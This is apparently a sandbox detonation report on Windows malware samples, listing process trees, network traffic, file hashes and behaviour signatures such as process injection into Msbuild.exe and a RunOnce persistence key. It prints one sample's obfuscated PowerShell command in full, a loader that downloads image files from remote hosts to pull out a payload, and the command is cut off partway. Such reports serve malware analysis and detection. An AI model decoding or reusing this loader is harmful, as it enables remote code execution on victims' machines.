PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 1280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 1280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff368746f8,0x7fff36874708,0x7fff36874718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1828 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 94bd9c36e88be77b106069e32ac8d934
SHA1 32bd157b84cde4eaf93360112d707056fc5b0b86
SHA256 8f49a43a08e2984636b172a777d5b3880e6e82ad25b427fef3f05b7b4f5c5b27
SHA512 7d4933fae6a279cc330fde4ae9425f66478c166684a30cec9c5c3f295289cf83cbdf604b8958f6db64b0a4b1566db102fbcbdcdb6eca008d86d9a9c8b252ff16

\??\pipe\LOCAL\crashpad_4048_NYEMDOTVAYUBLUHT

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 25f87986bcd72dd045d9b8618fb48592
SHA1 c2d9b4ec955b8840027ff6fd6c1f636578fef7b5
SHA256 d8b542281740c12609279f2549f85d3c94e6e49a3a2a4b9698c93cca2dce486c
SHA512 0c8a0d1a3b0d4b30773b8519a3d6e63d92973733da818ca9838599a9639e18df18ce31ebf56f46f6bbb7d89d10c726f4d73781e154d115a6068a3be7dd12b314

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 dbb24d164504f325a569b4717af3f34b
SHA1 8646eae93c8874139d5a1a1272bcce3d2335eeb1
SHA256 8a894748357645eb16ef5bcd6ee0acfbb4dfb278bc5e362ac0081d5fd4317fa7
SHA512 af0552ebde3aa89446fc2051518f983624e1f40560642a8d9d495afee86c20e775801a0c703a21c63785840fc90b8de06d6b3dab3b06487497ca9e281376aa9b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ad50a53fe7b005cef48df60ef8bd2469
SHA1 7ec7b557dfde99473f9b379a4ca7583f4976a374
SHA256 80feb7d6ba4736405a37d5dff1abf624ad30f246e4b60caf739c2258ac9a3a50
SHA512 7c2059614def99438781a3ae0c77fe0519a2fcf9b021bf5f08b34253cc41dc4239b802a1668144ed6c6229c419df75d9d307e6d2fa5fd569005209207abc69aa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 690ac393efa65c81b05787f038874229
SHA1 db338df0a274fb22f127b4e073da1efae754c15e
SHA256 d6e60bec2996040b9639f936d124aa6b33a543e9b4e4a9b8c482a596683545e0
SHA512 fddfe8ac715bd2158e69b26f00777a30b46b02287c1c6d3fb495f8463c3220844d62798430fbf05abb3fce3084cbe82c039cf2753969604f30a0f2e74c4b0782

Analysis: behavioral24

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Windows\SYSTEM32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1484 set thread context of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings C:\Windows\SYSTEM32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4060 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe C:\Windows\SYSTEM32\cmd.exe
PID 4060 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe C:\Windows\SYSTEM32\cmd.exe
PID 3552 wrote to memory of 1856 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WScript.exe
PID 3552 wrote to memory of 1856 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WScript.exe
PID 1856 wrote to memory of 888 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1856 wrote to memory of 888 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 888 wrote to memory of 1484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 888 wrote to memory of 1484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1484 wrote to memory of 4176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c 67bcef97a5ffe.vbs

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67bcef97a5ffe.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GY@ZwBo@Gg@a@Bo@Gg@a@Bo@C8@dgBk@GY@ZgBn@GQ@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@